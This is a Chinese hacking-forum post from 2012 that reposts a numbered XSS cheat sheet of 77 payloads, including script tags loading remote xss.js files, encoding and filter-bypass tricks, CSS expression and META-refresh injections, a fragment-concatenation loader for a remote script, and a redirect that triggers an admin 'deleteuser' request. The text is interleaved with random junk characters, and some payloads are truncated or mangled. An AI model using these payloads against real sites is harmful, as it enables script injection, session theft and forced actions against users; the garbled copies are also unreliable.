貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。( N- ^) k& f' _" V
9 @% n0 E) Q4 a# U+ q- }% J
(1)普通的XSS JavaScript注入
8 B% U+ `* A! c9 @ z1 T <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* x( ^! E1 [/ s7 B$ B
$ @& R( n& A: B! R7 \! P- v
(2)IMG标签XSS使用JavaScript命令
6 \! _4 l$ j- \+ I* V <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># x1 \' B! M7 k5 n# N& H) F$ e
. y7 I0 y* g$ n. B9 B, }7 G
(3)IMG标签无分号无引号
9 q5 i: {4 U3 x t! V% F5 O4 y <IMG SRC=javascript:alert(‘XSS’)>% W# R: Q O: r" P- O/ o% x
9 `( q* e8 }% z, c$ a (4)IMG标签大小写不敏感8 l _9 Q& M3 F: _$ [) {- ?) K$ V/ E
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>2 e) ~+ J8 y( M. d* Z9 ]2 c, C6 L8 b
1 L' K8 H) {- Z: y) j9 y7 Y0 t (5)HTML编码(必须有分号)0 |/ A0 S$ b+ q. e# b
<IMG SRC=javascript:alert(“XSS”)>
0 p! k7 Z2 L6 t* P, m1 J/ R# b: m) o+ D! e: |' [1 @
(6)修正缺陷IMG标签
6 [, o) \2 S4 B" w <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>4 m+ g+ d) v0 H7 ~7 S D
! V& W$ r4 G# S' d* K6 t (7)formCharCode标签(计算器)# k( r7 Q7 J F8 ^% R
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>( L& e# N3 `0 C8 O n3 N
$ {2 E' L# p- w3 P5 F (8)UTF-8的Unicode编码(计算器)
_7 l( H4 M3 i' G* G7 ~/ |# w* A/ ? <IMG SRC=jav..省略..S')>9 s, Q1 p& D7 }4 @
' F' K( D4 {( D Q4 w (9)7位的UTF-8的Unicode编码是没有分号的(计算器)" F: R( U) l2 W! q2 a2 k
<IMG SRC=jav..省略..S')>1 T9 S: U+ l. O" `* r- f4 \; e5 h
l' p& [0 @7 [/ k; u
(10)十六进制编码也是没有分号(计算器)
# x9 B9 S2 h6 w" i' D <IMG SRC=java..省略..XSS')>
& y4 K3 `5 w* ^5 I0 |3 Y
4 P6 y; G- _- J5 S8 X3 E; V (11)嵌入式标签,将Javascript分开
0 e. A' y0 m$ r; X1 C <IMG SRC=”jav ascript:alert(‘XSS’);”>- P" S: d+ ^$ {4 n- A( A: `$ C* e, g
6 `( g0 [+ F& \
(12)嵌入式编码标签,将Javascript分开
* N5 S. S; t0 G! S9 ? <IMG SRC=”jav ascript:alert(‘XSS’);”>1 g5 N! b$ b" j7 D$ Z) f
5 a! a, `8 i! l: ^; ^- `! t) Z
(13)嵌入式换行符
. y* }% Z* i% K4 S6 D% K <IMG SRC=”jav ascript:alert(‘XSS’);”>1 [8 ?7 G& R$ R1 `
! K( M# y9 Y" z( c3 G (14)嵌入式回车
2 u$ \+ K7 y* h7 s9 G) F <IMG SRC=”jav ascript:alert(‘XSS’);”>( _' c' V& E; U0 C
7 i' x! L, f/ @+ H (15)嵌入式多行注入JavaScript,这是XSS极端的例子
1 \8 C8 D6 |# s$ u% i <IMG SRC=”javascript:alert(‘XSS‘)”>( C% z" `0 U, v8 C8 G
$ a: v, `/ ~+ Y$ H8 _ (16)解决限制字符(要求同页面)
4 F- ~/ B% F/ K! t( } <script>z=’document.’</script>
" |( F$ R( s6 u' Z9 s9 n& b P3 I <script>z=z+’write(“‘</script>; x! `1 X3 d1 \5 w2 _9 x
<script>z=z+’<script’</script>0 k6 {! S( X |1 W% N8 I. s, s
<script>z=z+’ src=ht’</script>
" g9 `0 T1 F( H _( v <script>z=z+’tp://ww’</script>
1 f" B6 B- d2 R: R( p( j <script>z=z+’w.shell’</script>
4 U! c& k) V5 Z% k9 Q6 S <script>z=z+’.net/1.’</script>
6 ~" ~4 P0 i/ X! i# P) i# \' |2 ] <script>z=z+’js></sc’</script>) c c/ @/ E2 |2 _6 e$ v# P
<script>z=z+’ript>”)’</script>
8 a3 c/ }( A/ [1 L/ p {% R <script>eval_r(z)</script># }2 w% ~+ C- V
7 S; R* t" c1 ?6 {, Z8 h) l6 h1 D
(17)空字符
. v( a+ L8 ^3 n$ { perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out7 } h8 c# Q! ~: F0 @, |
" Y& f! D; b& A2 R( @3 K
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用/ h* u9 ^/ _ `/ W+ y( x0 ^
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ f6 `/ b: S/ _" Q. N# E$ b
- a$ f$ o, @) X9 w: n8 `. D2 H: y& U
(19)Spaces和meta前的IMG标签
! C q% |' T' V8 j5 Y& ~ <IMG SRC=” � javascript:alert(‘XSS’);”>
/ d/ I' k6 c0 k" G6 @+ S r% I/ E: m! `( C7 w
(20)Non-alpha-non-digit XSS
* e' |, J! ^( g& n <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 V4 G/ J7 x" }9 B j& i
4 A% A9 c8 m, x4 P+ J! T+ U) `
(21)Non-alpha-non-digit XSS to 2
/ z8 K1 E) T8 @, v, J/ Y5 Z <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
/ Y% S# v+ p9 A6 x" [* I( L1 H0 y0 [/ {- T1 F7 Q2 o
(22)Non-alpha-non-digit XSS to 3
+ ~- O- f& }- ? r <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) D3 d/ P1 b9 }- F
+ {- m' `/ Z9 K' H& u/ o. K: M9 v. |, } (23)双开括号
1 f) v' T. g. Z$ H U <<SCRIPT>alert(“XSS”);//<</SCRIPT>! J2 h! @, @8 R1 V
6 P# i9 }3 E' [7 y* X (24)无结束脚本标记(仅火狐等浏览器)# u/ c8 f( T) Y( b6 p4 G3 C
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B> g0 s; `" @ [ C, L! P+ t y+ q
. a7 c p& Z1 J b$ d (25)无结束脚本标记2
V$ ]5 S: F0 c. t$ O2 c4 v, d' O <SCRIPT SRC=//3w.org/XSS/xss.js>& n. x3 v( ?, N$ }' K8 a
9 x7 t4 y0 ~# S- _- Y (26)半开的HTML/JavaScript XSS2 A7 y* I1 e) |
<IMG SRC=”javascript:alert(‘XSS’)”+ @7 }' o" R: a/ p
4 }# P; f7 r6 a: r5 J4 H) S (27)双开角括号
- u, Z' n! H1 d/ |0 W <iframe src=http://3w.org/XSS.html <
5 E% h/ g; o: x/ D2 z
) {& F2 T1 y8 w (28)无单引号 双引号 分号
3 R7 b: ^+ L- V- C <SCRIPT>a=/XSS/
- p# [0 z, e# _4 }) O; _ alert(a.source)</SCRIPT>% Q( V# J. L/ [" d! U2 b
% o$ }* Q0 W+ u$ Q, \ R3 M (29)换码过滤的JavaScript
0 o: a1 g7 Z9 e; ~0 M \”;alert(‘XSS’);//
; M, C1 O- q9 ^' M/ w0 f+ ?1 B7 h( B( _- C2 E
(30)结束Title标签. Q( j9 o% w0 {1 y: @- R
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' p b) v2 O8 f' O
2 G8 U3 d. W& s (31)Input Image& Q+ |. ]4 O; }/ J( j3 a% ]
<INPUT SRC=”javascript:alert(‘XSS’);”>
% \# s4 B4 ^9 r6 Y M1 P8 S( M, o- j& b
(32)BODY Image% V9 d. x: B, e% ~7 g/ K) B, Q2 r8 Q
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
. z* _- b0 V7 o3 L: K( {) p, h$ ?1 ?3 p! R
(33)BODY标签# P' ?1 K/ @3 T# U6 W+ l
<BODY(‘XSS’)>
& X$ @* A5 k. a8 y6 F% k! V( e
# \5 U G6 R, O$ h9 y (34)IMG Dynsrc: i( `% {2 t- f4 K
<IMG DYNSRC=”javascript:alert(‘XSS’)”>) M: C1 l/ D2 E c3 v
$ O# k$ |* O1 _6 d- w% u# z" p) W
(35)IMG Lowsrc
/ e9 N8 H2 R3 E. {6 A0 ` <IMG LOWSRC=”javascript:alert(‘XSS’)”>. X2 L% s+ P4 g! M8 ?9 H/ f D
1 ~) l# K8 b4 J) q (36)BGSOUND4 x' O0 G9 s# j/ C; W, N6 B6 ~$ Y7 d: I
<BGSOUND SRC=”javascript:alert(‘XSS’);”>! T: s( r+ \; K1 J4 \
9 ~; u# x2 Y, h3 V
(37)STYLE sheet
% F0 ?. n O6 w% j& m <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 `# r& d$ I+ a: i
4 F$ r( {8 V2 G# C3 q (38)远程样式表2 {4 ~& e5 s& O) I
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ I+ V; }- k1 M' h' W3 d# B2 K) {# b" V5 ? C; g9 ^! m, w/ C
(39)List-style-image(列表式). P! P; D+ f, u8 y% k
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; ^$ e1 r3 `( q: Z# {0 m$ l) M
9 g0 w0 t" {6 d5 B U. N (40)IMG VBscript$ F) X* b; ^2 n+ C2 I
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. |9 B# j6 H. P/ E9 Z5 D6 g: [
4 F# a7 b( V( e" N" `* H2 B
(41)META链接url3 c5 f. {8 e) `" z2 R1 ?+ f
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>3 H. _$ l- l( r7 q0 W' s, }& z1 A' d
1 h( Z) s' ^1 t0 C$ q
(42)Iframe
; u2 g6 w. h$ A& s6 R7 k4 q <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> X- {4 s; a( Q2 `! b
( p1 L0 N9 v* {$ N$ A q
(43)Frame3 y+ t, M0 V) C# _
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>5 t. v7 i, S3 L) s
: [) X4 p$ i3 V2 W3 Z. Y (44)Table8 @5 s6 O( B2 o& w6 i
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
: x! x7 }8 ]& P' W) ?- |& T9 |9 o
(45)TD1 x( j! v9 U2 H9 {) w9 i2 F
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
! Q% s, [- C. _6 M' B/ R7 b
6 Q5 ~, E t1 N (46)DIV background-image! _8 u# p6 c( p/ I, `
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, G: d' V( A+ [4 Z8 I! V4 T& O4 y7 _ R. c5 A, _5 E
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279), s) }6 D( a1 Q9 I' y3 ]) G; r! ~
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
1 Q1 T+ @- `& I ~ [
( ^% N# r5 k' M, [ (48)DIV expression: R3 u7 y5 k3 g4 B! a
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>/ D1 X. ?% J, d0 i) E" J( o0 m
; u% l; P0 `# l0 F# ]
(49)STYLE属性分拆表达
" `2 w; Y* _7 h/ C <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>3 \1 `7 w) f1 T8 F1 g' G. V# _
$ ?7 S7 _) |5 P) L6 Y7 R, V (50)匿名STYLE(组成:开角号和一个字母开头)
) K# N2 r1 `" x' N3 k" Z: Y! { <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>1 N( T4 n5 E3 a- I# h7 A
4 L9 O+ V1 H$ a( S7 a3 g
(51)STYLE background-image# `. ^4 R% }- R! \* g
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>6 e9 `6 S% B2 U9 k* X5 q
; U4 A' C5 X3 @2 f H S (52)IMG STYLE方式- q. ^% N0 x& ]" \; `$ D
exppression(alert(“XSS”))’>+ Y P3 z* c$ U% {! K* {' ?. i$ t
! P c, o# X6 }
(53)STYLE background
7 F: {# X# {, @ J$ K3 [& e <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>& }+ P4 |1 e: @% h* {5 V; Z
) |# b$ b6 V' }2 a) ^
(54)BASE2 W/ L) ]' H6 Q3 h: I$ o! X+ ^
<BASE HREF=”javascript:alert(‘XSS’);//”>" N2 t7 x2 o' r. C8 T/ \
* G% s4 x6 N& C6 E- `, m+ O# U" i
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS& _2 N0 L. W2 X u8 W0 v
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
1 J1 f5 y5 h w* w- G9 R1 X8 k
6 M& W j" N! p# U6 o( ^3 v5 r (56)在flash中使用ActionScrpt可以混进你XSS的代码2 n9 s3 ^- w/ m9 ~! U
a=”get”;/ Y4 @6 U$ }- v6 p2 j/ d
b=”URL(\”";. [+ D* Q! s5 X4 z4 i
c=”javascript:”;; L. r( F& Z' W$ u" T6 i: E
d=”alert(‘XSS’);\”)”;" u# l; F, M2 q/ L9 G8 d! e$ U
eval_r(a+b+c+d);
+ B3 R5 |4 d, k4 y5 i, H, E
' o! c! B9 w! O& K' V' l (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
* G: M( E# X! y4 E2 M- \6 } <HTML xmlns:xss>
. D( O% [: M8 b O9 u% S: P" } <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
$ Y+ x+ ^) Z* z# S3 u# F0 n <xss:xss>XSS</xss:xss>0 x. R: i3 D; c" \( @
</HTML>
! j5 \3 z4 F8 V. k1 p* I/ E- T
9 `0 b$ ]( h# ^& _. n. Z& _ (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
# H1 r0 V* p2 Z8 \2 ?: @ <SCRIPT SRC=””></SCRIPT>( ~7 p* X' v6 t1 _! U6 C; j
8 V' @' _# x% v) n (59)IMG嵌入式命令,可执行任意命令& `& [% d* [# d! }0 B9 c* ]) a
<IMG SRC=”http://www.XXX.com/a.php?a=b”>! x( ]. o. S2 y$ S7 E0 m) n4 r
! P- M5 v1 r9 f/ `1 x1 z4 Z4 o
(60)IMG嵌入式命令(a.jpg在同服务器)
, Z9 s6 _& ^' o& F$ ^: u9 d Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser F0 ~- i/ E, m, o- |
6 I4 W; |+ N$ |2 D (61)绕符号过滤
' N0 f! i3 d. g0 T6 J* R <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 m. G' n5 n7 {& Z {6 X1 R b
/ J e6 m1 h" K s4 _ u (62)* P! r# a- K2 u# T9 j
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>2 C) o* T, O% M6 q2 ?! @
1 T" K \* O( N% f- F0 o. l (63)3 w( m/ V. q, E; a- [- {
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>" @# P9 w( ^7 q9 G5 y. s) @3 T
$ O" v& v- v, J: `
(64)
1 a' U; ]6 s. Q" } <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>) c1 Z) R4 {/ `6 t5 o! N
2 U8 a& ^! p! F
(65)
2 Y, ~ G: N2 b5 `3 P <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
% I! g$ g$ n- f+ o, b( q7 f+ Q7 Q8 _% M2 [! Y9 v
(66)
q' P7 m o1 b2 ?$ I <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
% {5 m& i1 V) p! u& ?* T
- y: w; }( P4 D) x) e0 [ (67): ~! f/ b' \. b. g. h, o3 T
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
0 C7 M* i9 D; q6 k6 D5 }0 G7 _
1 w/ e+ k/ h/ d/ C! v7 S; g) j7 k B/ K (68)URL绕行" I" h$ S& ^+ X- C1 u
<A HREF=”http://127.0.0.1/”>XSS</A>
* p8 p1 t# ? v/ A) I
- o/ l) e) ~. s: g2 J" R# k* C (69)URL编码+ o& } H' y9 _; C8 ]
<A HREF=”http://3w.org”>XSS</A>: V" T6 ?% H0 x9 I3 N
! L" E, U* W' }7 U8 q: l (70)IP十进制
* x$ n7 b) @ _1 r <A HREF=”http://3232235521″>XSS</A>- E/ g1 I$ m& C: b6 a! E2 N
* k4 U1 x, z* s6 @. M (71)IP十六进制* [) O- a3 E/ w: v! m5 h; }% Y
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 H7 m$ G8 H2 N* f4 x# G
/ g# |( n- {7 L8 k (72)IP八进制4 g$ v/ n8 n. W8 @( x9 ^0 ^
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
; Z0 H( Y5 a3 e9 ]7 b( Y7 Y6 V8 X
* {8 H1 k9 ]. E/ w& k$ f% b+ u) Y (73)混合编码
$ y H# B% i' S+ { <A HREF=”h
6 @- `; k7 R- _1 T. F tt p://6 6.000146.0×7.147/”">XSS</A>
0 v' E1 O: P5 }9 v- q& `* N- \( }5 F! Q! G- I9 `
(74)节省[http:]
1 m9 F( u; ~/ m& b1 v <A HREF=”//www.google.com/”>XSS</A>0 h% P9 x8 M# x! j$ U4 Q4 a
* g$ r r! ?- M, M3 _ (75)节省[www] u" E! I9 l8 F& e
<A HREF=”http://google.com/”>XSS</A>
+ h8 V7 Z, y8 ^5 {! F* y: f1 ] p* u4 x
& D& o8 ]8 f- C I) ~0 E: y* o( }4 p (76)绝对点绝对DNS
* G* W# J. g& F9 s <A HREF=”http://www.google.com./”>XSS</A>* Q' |) O4 l+ k; \* ^. `
( X9 a$ K, G* T* @7 Z, n0 _ (77)javascript链接
5 C3 ^6 } k) [# o& e <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对